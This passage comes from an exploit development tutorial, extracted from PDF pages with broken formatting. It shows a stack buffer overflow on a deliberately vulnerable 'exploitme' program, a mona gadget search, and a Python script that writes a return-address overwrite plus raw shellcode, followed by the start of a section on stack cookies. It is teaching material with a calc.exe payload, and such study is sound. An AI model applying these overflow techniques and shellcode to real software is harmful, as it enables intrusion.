aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
The program should crash and a dialog should appear with this message:
 
Unhandled exception at 0x61616161 in exploitme1.exe: 0xC0000005: Access
 violation reading location 0x61616161.
 
The 
ASCII code
 for ‘
a
‘ is 0x61, so we overwrote 
ret eip
 with “
aaaa
“, i.e. 0x61616161, and the 
ret
 instruction 
jumped to 0x61616161 which is an invalid address. Now let’s verify that 
ret eip
 is at 
name + 36
 by enterin
g 
36 “
a
“s, 4 “
b
“s and some “
c
“s:
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccccccc
 
We’re greeted with the following message:
 
Unhandled exception at 0x62626262 in exploitme1.exe: 0xC0000005: Access violation reading location 0x62626262.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 93 
-
 
This confirms our gu
ess. (Note that 0x62626262 is “
bbbb
“.)
 
To summarize, here’s our stack before and after 
scanf()
:
 
         
name[0..3]                      aaaa
 
         name[4..7]                      aaaa
 
         .                               .
 
    B    .               
           
A    .
 
    E    .                          F    .
 
    F    name[28..31]  =========>   T    aaaa
 
    
O    saved ebp                  E    aaaa
 
    R    ret eip                    R    bbbb
 
    E    argc                            cccc
 
         ar
gv                            cccc
 
         envp                            cccc
 
To make things easier, let’s modify the program so that the text is read from the file 
c:
\
name.dat
:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Readin
g name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
 
    
fclose
(
f
);
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
Create the file 
name.dat
 in 
c:
\
 with the following content:
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccccccccccccccccccccccccc
 
Now load 
exploitme1.exe
 in WinDbg and hit 
F5
 (go). You should see an exception:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 94 
-
 
(
180c.5b0): Access violation 
-
 code c0000005 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=6d383071 edx=00835451 esi=00000001 edi=00000000
 
eip=626
26262 esp=0041f7d0 ebp=61616161 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
62626262 ??              ???
 
Let’s have a look at the part of stack pointed to by ESP:
 
0:000> d @esp
 
0041f7
d0  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
0041f7e0  63 63 63 63 63 63 63 63
-
63 63 63 00 00 00 00 00  ccccccccccc.....
 
0041f7f0  dc f7 41 00 28 00 00 00
-
44 f8 41 00 09 17 35 01  ..A.(...D.A...5.
 
0041f800  b9 17 e0 fa 00 00 00 00
-
14 f8 41 00 8a 33 0c 76  ..........A..3.v
 
0041f810  00 e0 fd 7e 54 f8 41 00
-
72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~
 
0041f820  2c 2d 41 75 00 00 00 00
-
00 00 00 00 00 e0 fd 7e  ,
-
Au...........~
 
0041f830  00 00 00 00 00 00 00 00
-
00 00 00 00 20 f8 41 00  ...
......... .A.
 
0041f840  00 00 00 00 ff ff ff ff
-
f5 71 a3 77 28 10 9e 02  .........q.w(...
 
0:000> d @esp
-
0x20
 
0041f7b0  61 61 61 61 61 61 61 61
-
61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
 
0041f7c0  61 61 61 61 61 61 61 61
-
61 61 61 61 62 62 62 62  aaaaaaaaaaaa
bbbb
 
0041f7d0  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
0041f7e0  63 63 63 63 63 63 63 63
-
63 63 63 00 00 00 00 00  ccccccccccc.....
 
0041f7f0  dc f7 41 00 28 00 00 00
-
44 f8 41 00 09 17 35 01  ..A.(...D.A...5.
 
0041f800  b9 17 e0 fa 0
0 00 00 00
-
14 f8 41 00 8a 33 0c 76  ..........A..3.v
 
0041f810  00 e0 fd 7e 54 f8 41 00
-
72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~
 
0041f820  2c 2d 41 75 00 00 00 00
-
00 00 00 00 00 e0 fd 7e  ,
-
Au...........~
 
Perfect! ESP points at our “
c
“s. Note that ESP is 0
x41f7d0. Now let’s run 
exploitme1.exe
 again by pressing 
CTRL+SHIFT+F5
 (restart) and 
F5
 (go). Let’s look again at the stack:
 
0:000> d @esp
 
0042fce0  63 63 63 63 63 63 63 63
-
63 63 63 63 63 63 63 63  cccccccccccccccc
 
0042fcf0  63 63 63 63 63 63 63 63
-
63 63 63
 00 00 00 00 00  ccccccccccc.....
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 95 
-
 
0042fd00  ec fc 42 00 29 00 00 00
-
54 fd 42 00 09 17 12 00  ..B.)...T.B.....
 
0042fd10  94 7f 07 21 00 00 00 00
-
24 fd 42 00 8a 33 0c 76  ...!....$.B..3.v
 
0042fd20  00 e0 fd 7e 64 fd 42 00
-
72 9f 9f 77 00 e0 fd 7e  ...~d.B.r..
w...~
 
0042fd30  c4 79 5c 75 00 00 00 00
-
00 00 00 00 00 e0 fd 7e  .y
\
u...........~
 
0042fd40  00 00 00 00 00 00 00 00
-
00 00 00 00 30 fd 42 00  ............0.B.
 
0042fd50  00 00 00 00 ff ff ff ff
-
f5 71 a3 77 f0 41 80 02  .........q.w.A..
 
As you can see, ESP st
ill points at our “
c
“s, but the address is different. Let’s say we put our shellcode in 
place of the “
c
“s. We can’t overwrite 
ret eip
 with 0x42fce0 because the right address keeps changing. But 
ESP always point at our shellcode, so why don’t we overwrite 
r
et eip
 with the address of a piece of memory 
containing a 
JMP ESP
 instruction?
 
Let’s use 
mona
 (
refresher
) to find this instruction:
 
0:000> .load pykd.pyd
 
0:000> !py mona
 
Hold on...
 
[+] Command used:
 
!py mona.py
 
     'mo
na' 
-
 Exploit Development Swiss Army Knife 
-
 WinDbg (32bit)
 
     Plugin version : 2.0 r554
 
     PyKD version 0.2.0.29
 
     Written by Corelan 
-
 https://www.corelan.be
 
     
Project page : https://github.com/corelan/mona
 
    |
--------------------------------
----------------------------------
|
 
    |                                                                  |
 
    |    _____ ___  ____  ____  ____ _                                 |
 
    |    / __ `__ 
\
/ __ 
\
/ __ 
\
/ __ `/  https://www.corelan.be         |
 
 
   |   / / / / / / /_/ / / / / /_/ /  https://www.corelan
-
training.com|
 
    
|  /_/ /_/ /_/
\
____/_/ /_/
\
__,_/  #corelan (Freenode IRC)          |
 
    |                                                                  |
 
    |
---------------------------------
---------------------------------
|
 
 
Global options :
 
----------------
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 9
6 
-
 
You can use one or more of the following global options on any command that will perform
 
a search in one or more modules, returning a list of pointers :
 
 
-
n                     : Skip mo
dules that start with a null byte. If this is too broad, use
 
                          option 
-
cm nonull instead
 
 
-
o                     : Ignore OS modules
 
 
-
p <nr>                : Stop search after <nr> pointers.
 
 
-
m <module,module,...> : only query the
 given modules. Be sure what you are doing !
 
                          You can specify multiple modules (comma separated)
 
                          Tip : you can use 
-
m *  to include all modules. All other module criteria will be ignored
 
                  
        Other wildcards : *blah.dll = ends with blah.dll, blah* = starts with blah,
 
                          blah or *blah* = contains blah
 
 
-
cm <crit,crit,...>    : Apply some additional criteria to the modules to query.
 
                          You can
 use one or more of the following criteria :
 
                          aslr,safeseh,rebase,nx,os
 
                          You can enable or disable a certain criterium by setting it to true or false
 
                          Example :  
-
cm aslr=true,safes
eh=false
 
                          Suppose you want to search for p/p/r in aslr enabled modules, you could call
 
                          !mona seh 
-
cm aslr
 
 
-
cp <crit,crit,...>    : Apply some criteria to the pointers to return
 
                          A
vailable options are :
 
                          unicode,ascii,asciiprint,upper,lower,uppernum,lowernum,numeric,alphanum,nonull,startswithnull,unicoderev
 
                          Note : Multiple criteria will be evaluated using 'AND', except if you are lo
oking for unicode + one crit
 
 
-
cpb '
\
x00
\
x01'        : Provide list with bad chars, applies to pointers
 
                          You can use .. to indicate a range of bytes (in between 2 bad chars)
 
 
-
x <access>            : Specify desired access level of
 the returning pointers. If not specified,
 
                          only executable pointers will be return.
 
                          Access levels can be one of the following values : R,W,X,RW,RX,WX,RWX or *
 
 
Usage :
 
-------
 
 
 !mona <command> <parameter
>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 97 
-
 
 
Available commands and parameters :
 
 
? / eval             | Evaluate an expression
 
allocmem / alloc     | Allocate some memory in the process
 
assemble / asm       | Convert instructions to opcode. Separate multiple instructions with #
 
bpseh / sehbp     
   | Set a breakpoint on all current SEH Handler function pointers
 
breakfunc / bf       | Set a breakpoint on an exported function in on or more dll's
 
breakpoint / bp      | Set a memory breakpoint on read/write or execute of a given address
 
bytearray / ba
       | Creates a byte array, can be used to find bad characters
 
changeacl / ca       | Change the ACL of a given page
 
compare / cmp        | Compare contents of a binary file with a copy in memory
 
config / conf        | Manage configuration file (mona.in
i)
 
copy / cp            | Copy bytes from one location to another
 
dump                 | Dump the specified range of memory to a file
 
dumplog / dl         | Dump objects present in alloc/free log file
 
dumpobj / do         | Dump the contents of an object
 
e
gghunter / egg      | Create egghunter code
 
encode / enc         | Encode a series of bytes
 
filecompare / fc     | Compares 2 or more files created by mona using the same output commands
 
fillchunk / fchunk   | Fill a heap chunk referenced by a register
 
fin
d / f             | Find bytes in memory
 
findmsp / findmsf    | Find cyclic pattern in memory
 
findwild / fw        | Find instructions in memory, accepts wildcards
 
flow / flw           | Simulate execution flows, including all branch combinations
 
fwptr / f
wp          | Find Writeable Pointers that get called
 
geteat / eat         | Show EAT of selected module(s)
 
getiat / iat         | Show IAT of selected module(s)
 
getpc                | Show getpc routines for specific registers
 
gflags / gf          | Show 
current GFlags settings from PEB.NtGlobalFlag
 
header               | Read a binary file and convert content to a nice 'header' string
 
heap                 | Show heap related information
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 98 
-
 
help                 | show help
 
hidedebug / hd       | Attempt to hi
de the debugger
 
info                 | Show information about a given address in the context of the loaded application
 
infodump / if        | Dumps specific parts of memory to file
 
jmp / j              | Find pointers that will allow you to jump to a regis
ter
 
jop                  | Finds gadgets that can be used in a JOP exploit
 
kb / kb              | Manage Knowledgebase data
 
modules / mod        | Show all loaded modules and their properties
 
noaslr               | Show modules that are not aslr or rebased
 
nosafeseh            | Show modules that are not safeseh protected
 
nosafesehaslr        | Show modules that are not safeseh protected, not aslr and not rebased
 
offset               | Calculate the number of bytes between two addresses
 
pageacl / pacl      
 | Show ACL associated with mapped pages
 
pattern_create / pc  | Create a cyclic pattern of a given size
 
pattern_offset / po  | Find location of 4 bytes in a cyclic pattern
 
peb / peb            | Show location of the PEB
 
rop                  | Finds gadgets
 that can be used in a ROP exploit and do ROP magic with them
 
ropfunc              | Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain
 
seh                  | Find pointers to assist with SEH overwrite exploits
 
sehc
hain / exchain   | Show the current SEH chain
 
skeleton             | Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit
 
stackpivot           | Finds stackpivots (move stackpointer to controlled area)
 
stacks               
| Show all stacks for all threads in the running application
 
string / str         | Read or write a string from/to memory
 
suggest              | Suggest an exploit buffer structure
 
teb / teb            | Show TEB related information
 
tobp / 2bp           | 
Generate WinDbg syntax to create a logging breakpoint at given location
 
unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow
 
update / up          | Update mona to the latest version
 
 
Want more info about a given command
 ?  Run !mona help
 
The line we’re interested in is this:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 99 
-
 
jmp / j              | Find pointers that will allow you to jump to a register
 
Let’s try it:
 
0:000> !py mona jmp
 
Hold on...
 
[+] Command used:
 
!py mona.py jmp
 
Usage :
 
Default module criteria : non asl
r, non rebase
 
Mandatory argument :  
-
r   where reg is a valid register
 
 
[+] This mona.py action took 0:00:00
 
OK, we need another argument:
 
0:000> !py mona jmp 
-
r ESP
 
Hold on...
 
[+] Command used:
 
!py mona.py jmp 
-
r ESP
 
 
----------
 Mona command started on 20
15
-
03
-
18 02:30:53 (v2.0, rev 554) 
----------
 
[+] Processing arguments and criteria
 
    
-
 Pointer access level : X
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done. Let's rock 'n roll.
 
[+] Querying 0 modules
 
    
-
 Search comp
lete, processing results
 
[+] Preparing output file 'jmp.txt'
 
    
-
 (Re)setting logfile jmp.txt
 
    Found a total of 0 pointers
 
 
[+] This mona.py action took 0:00:00.110000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 100 
-
 
Unfortunately, it didn’t find any module. The problem is that all the modules suppor
t 
ASLR
 (
A
ddress 
S
pace 
L
ayout 
R
andomization), i.e. their base address changes every time they’re loaded into memory. For now, 
let’s pretend there is no ASLR and search for 
JMP ESP
 in the 
kernel32.dll
 module. Since this module is 
shared by every application,
 its position only changes when Windows is rebooted. This doesn’t make it less 
effective against exploits, but until we reboot Windows, we can pretend that there is no ASLR.
 
To tell mona to search in 
kernel32.dll
 we’ll use the global option 
-
m
:
 
0:000> !py 
mona jmp 
-
r ESP 
-
m kernel32.dll
 
Hold on...
 
[+] Command used:
 
!py mona.py jmp 
-
r ESP 
-
m kernel32.dll
 
 
----------
 Mona command started on 2015
-
03
-
18 02:36:58 (v2.0, rev 554) 
----------
 
[+] Processing arguments and criteria
 
    
-
 Pointer access level : X
 
    
-
 Only querying modules kernel32.dll
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done. Let's rock 'n roll.
 
[+] Querying 1 modules
 
    
-
 Querying module kernel32.dll
 
                                         ^ Memory access er
ror in '!py mona jmp 
-
r ESP 
-
m kernel32.dll'
 
 ** Unable to process searchPattern 'mov eax,esp # jmp eax'. **
 
    
-
 Search complete, processing results
 
[+] Preparing output file 'jmp.txt'
 
    
-
 (Re)setting logfile jmp.txt
 
[+] Writing results to jmp.txt
 
    
-
 Number of pointers of type 'call esp' : 2
 
    
-
 Number of pointers of type 'push esp # ret ' : 1
 
[+] Results :
 
0x760e7133 |   0x760e7133 (b+0x00037133)  : call esp | ascii {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebas
e: False, SafeSEH: True, OS: T
rue, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
0x7614ceb2 |   0x7614ceb2 (b+0x0009ceb2)  : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: Fal
se, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 101 
-
 
0x7610
a980 |   0x7610a980 (b+0x0005a980)  : push esp # ret  |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Reb
ase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:
\
Windows
\
syswow64
\
kernel32.dll)
 
    Found a total of 3 pointers
 
 
[+] This mona.py action took
 0:00:00.172000
 
OK! It found three addresses. Let’s use the last one:
 
0x7610a980 |   0x7610a980 (b+0x0005a980)  : push esp # ret  |  {PAGE_EXECUTE_READ}
 
Let’s verify that the address is correct:
 
0:000> u 0x7610a980
 
kernel32!GetProfileStringW+0x1d3e4:
 
7610a
980 54              push    esp
 
7610a981 c3              ret
 
7610a982 1076db          adc     byte ptr [esi
-
25h],dh
 
7610a985 fa              cli
 
7610a986 157640c310      adc     eax,10C34076h
 
7610a98b 76c8            jbe     kernel32!GetProfileStringW+0x1d
3b9 (7610a955)
 
7610a98d fa              cli
 
7610a98e 157630c310      adc     eax,10C33076h
 
As you can see, mona will not just search for 
JMP
 instructions but also for 
CALL
 and 
PUSH+RET
 
instructions. So, we need to overwrite 
ret eip
 with 0x7610a980, i.e. wi
th the bytes “
\
x80
\
xa9
\
x10
\
x76
” 
(remember that 
Intel CPUs
 are
 little
-
endian
).
 
Let’s write a little 
Python
 script. Let’s open 
IDLE
 and enter:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
ret_eip
 
=
 
'
\
x80
\
xa9
\
x10
\
x76'
 
    
shellcode
 
=
 
'
\
xcc'
 
    
name
 
=
 
'a
'
*
36
 
+
 
ret_eip
 
+
 
shellcode
 
    
f
.
write
(
name
)
 
 
Restart 
exploitme1.exe
 in WinDbg, hit 
F5
 and WinDbg will break on our shellcode (
0xCC
 is the opcode for 
int 3
 which is used by debuggers as a software breakpoint):
 
(1adc.1750): Break instruction exception 
-
 cod
e 80000003 (first chance)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 102 
-
 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:
\
Windows
\
syswow64
\
kernel32.dll 
-
 
eax=00000000 ebx=00000000 ecx=6d383071 edx=002e5437 esi=00000001 edi=00000000
 
eip=001cfbf8 esp=001cfbf8 ebp=61616161 io
pl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
 
001cfbf8 cc              int     3
 
Now let’s add real shellcode:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
ret_eip
 
=
 
'
\
x80
\
xa9
\
x10
\
x7
6'
 
    
shellcode
 
=
 
(
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
+
 
        
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
+
 
        
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
+
 
        
"
\
x55
\
x0
2
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
+
 
        
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
+
 
        
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
+
 
        
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x3
3
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
+
 
        
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
+
 
        
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
+
 
        
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x4
5"
+
 
        
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
+
 
        
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
+
 
        
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
+
 
        
"
\
xff
\
xff
\
x8b
\
x4
c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
+
 
        
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
+
 
        
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
+
 
        
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xd
e
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
+
 
        
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
+
 
        
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
+
 
        
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
    
name
 
=
 
'a'
*
36
 
+
 
ret_eip
 
+
 
shellcode
 
    
f
.
wr
ite
(
name
)
 
 
That shellcode was created by using
 
C++
 
 
#define HASH_ExitThread             0x4b3153e0
 
#define HASH_WinExec                0x7bb4c07f
 
 
int
 
entryPoint
()
 
{
 
    
DefineFuncPtr
(
WinExec
);
 
    
DefineFuncPtr
(
ExitThread
);
 
 
char
 
calc
[]
 
=
 
{
 
'c'
,
 
'a'
,
 
'l'
,
 
'c'
,
 
'.'
,
 
'e'
,
 
'x'
,
 
'e'
,
 
'
\
0'
 
};
     
// makes our shellcode shorter
 
    
My_WinExec
(
calc
,
 
SW_SHOW
);
 
    
My_ExitThread
(
0
);
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 103 
-
 
    
return
 
0
;
 
}
 
 
Have a look at the article about
 
shellcode
 for a refresher.
 
If you no
w run 
exploitme1.exe
, a calculator should pop up. Wow... our first exploit!
 
Troubleshooting
 
If the exploit doesn’t work on your system, it might be because of limited space on the stack. Read the 
article 
More space on the stack
.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 104 
-
 
Exploitme2 (Stack cookies & SEH)
 
 
If you haven’t already, read the previous article (
Exploitme1
) and then come back here.
 
We’ll use the same code as before:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Enter your name and press ENTER
\
n"
);
 
    
scanf
(
"%s"
,
 
name
);
 
    
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
This time, however, we’ll configure things differently.
 
In 
VS 2013
, we’ll disable 
DEP
 by going to 
Project
→
properties
, and modifying the configuration for 
Release
 
as follows:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Data Execution Prevention (DEP): No (/NXCOMPAT:NO)
 
Make sure that we have
 

 
Configuration Properties
 
o
 
C/C++
 

 
Code Generation
 

 
Security Check: Enable Se
curity Check (/GS)
 
If you still have the file 
c:
\
name.dat
 used for 
exploitme1.exe
, and try to run 
exploitme2.exe
, you’ll get a crash 
and no calculator. Why?
 
Here’s the corresponding assembly code:
 
int main() {
 
00101000 55                   push        ebp 
 
 
00101001 8B EC                mov         ebp,esp  
 
00101003 83 EC 24             sub         esp,24h  
 
00101006 A1 00 30 10 00       mov         eax,dword ptr ds:[00103000h]  
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 105 
-
 
0010100B 33 C5                xor         eax,ebp  
 
0010100D 89 45 FC        
     mov         dword ptr [ebp
-
4],eax  
 
    
char name[32];
 
    printf("Enter your name and press ENTER
\
n");
 
00101010 68 00 21 10 00       push        102100h  
 
00101015 FF 15 90 20 10 00    call        dword ptr ds:[102090h]  
 
    scanf("%s", name);
 
00101
01B 8D 45 DC             lea         eax,[name]  
 
0010101E 50                   push        eax  
 
0010101F 68 24 21 10 00       push        102124h  
 
00101024 FF 15 94 20 10 00    call        dword ptr ds:[102094h]  
 
    printf("Hi, %s!
\
n", name);
 
0010102A
 8D 45 DC             lea         eax,[name]  
 
0010102D 50                   push        eax  
 
0010102E 68 28 21 10 00       push        102128h  
 
00101033 FF 15 90 20 10 00    call        dword ptr ds:[102090h]  
 
    return 0;
 
}
 
00101039 8B 4D FC         
    mov         ecx,dword ptr [ebp
-
4]  
 
0010103C 83 C4 14             add         esp,14h  
 
0010103F 33 CD                xor         ecx,ebp  
 
00101041 33 C0                xor         eax,eax  
 
00101043 E8 04 00 00 00       call        __security_check_c
ookie (010104Ch)  
 
00101048 8B E5                mov         esp,ebp  
 
0010104A 5D                   pop         ebp  
 
0010104B C3                   ret
 
Here’s the old code for comparison:
 
int main() {
 
01391000 55                   push        ebp  
 
013910
01 8B EC                mov         ebp,esp  
 
01391003 83 EC 20             sub         esp,20h  
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 106 
-
 
    char name[32];
 
    
printf("Enter your name and press ENTER
\
n");
 
01391006 68 00 21 39 01       push        1392100h  
 
0139100B FF 15 8C 20 39 01    call   
     dword ptr ds:[139208Ch]  
 
    scanf("%s", name);
 
01391011 8D 45 E0             lea         eax,[name]  
 
01391014 50                   push        eax  
 
01391015 68 24 21 39 01       push        1392124h  
 
0139101A FF 15 94 20 39 01    call        dwor
d ptr ds:[1392094h]  
 
    printf("Hi, %s!
\
n", name);
 
01391020 8D 45 E0             lea         eax,[name]  
 
01391023 50                   push        eax  
 
01391024 68 28 21 39 01       push        1392128h  
 
01391029 FF 15 8C 20 39 01    call        dword
 ptr ds:[139208Ch]  
 
0139102F 83 C4 14             add         esp,14h  
 
    return 0;
 
01391032 33 C0                xor         eax,eax  
 
}
 
01391034 8B E5                mov         esp,ebp  
 
01391036 5D                   pop         ebp  
 
01391037 C3    
               ret
 
Let’s omit the uninteresting bits.
 
Old code:
 
int main() {
 
01391000 55                   push        ebp  
 
01391001 8B EC                mov         ebp,esp  
 
01391003 83 EC 20             sub         esp,20h  
 
.
 
.
 
.
 
01391034 8B E5       
         mov         esp,ebp  
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 107 
-
 
01391036 5D                   pop         ebp  
 
01391037 C3                   ret
 
New code:
 
int main() {
 
00101000 55                   push        ebp  
 
00101001 8B EC                mov         ebp,esp  
 
00101003 83 EC 24   
          sub         esp,24h  
 
00101006 A1 00 30 10 00       mov         eax,dword ptr ds:[00103000h]  
 
0010100B 33 C5                xor         eax,ebp  
 
0010100D 89 45 FC             mov         dword ptr [ebp
-
4],eax  
 
.
 
.
 
.
 
00101039 8B 4D FC          
   mov         ecx,dword ptr [ebp
-
4]  
 
0010103C 83 C4 14             add         esp,14h  
 
0010103F 33 CD                xor         ecx,ebp  
 
00101041 33 C0                xor         eax,eax  
 
00101043 E8 04 00 00 00       call        __security_check_co
okie (010104Ch)  
 
00101048 8B E5                mov         esp,ebp  
 
0010104A 5D                   pop         ebp  
 
0010104B C3                   ret
 
After the 
prolog
 of the new code, the stack should look like this:
 
  esp 
--
> name[0..3]
 
          name[4
..7]
 
          .
 
          .
 
          .
 
          name[28..31]
 
ebp
-
4 
--
> cookie
 
  ebp 
--
> saved ebp
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 108 
-
 
          ret eip
 
          .
 
          .
 
          .
 
The idea is that the prolog sets the 
cookie
 and the 
epilog
 checks that the cookie isn’t changed. If t
he cookie 
was changed, the epilog crashes the program before the 
ret
 instruction is executed. Note the position of the 
cookie: if we overflow 
name
, we overwrite both the cookie and 
ret eip
. The epilog crashes the program 
before we can take control of the e
xecution flow.
 
Let’s look at the prolog:
 
00101006 A1 00 30 10 00       mov         eax,dword ptr ds:[00103000h]  
 
0010100B 33 C5                xor         eax,ebp  
 
0010100D 89 45 FC             mov         dword ptr [ebp
-
4],eax
 
First the cookie is read f
rom 
ds:[00103000h]
 and then it’s xored with EBP before it’s saved in 
[ebp
-
4]
. This 
way, the cookie depends on EBP meaning that nested calls have different cookies. Of course, the cookie in 
ds:[00103000h]
 is random and was computed 
at runtime
 during the ini
tialization.
 
Now that we understand the problem, we can go back to the 
fread()
 version of our code, which is easier (in a 
sense) to exploit:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
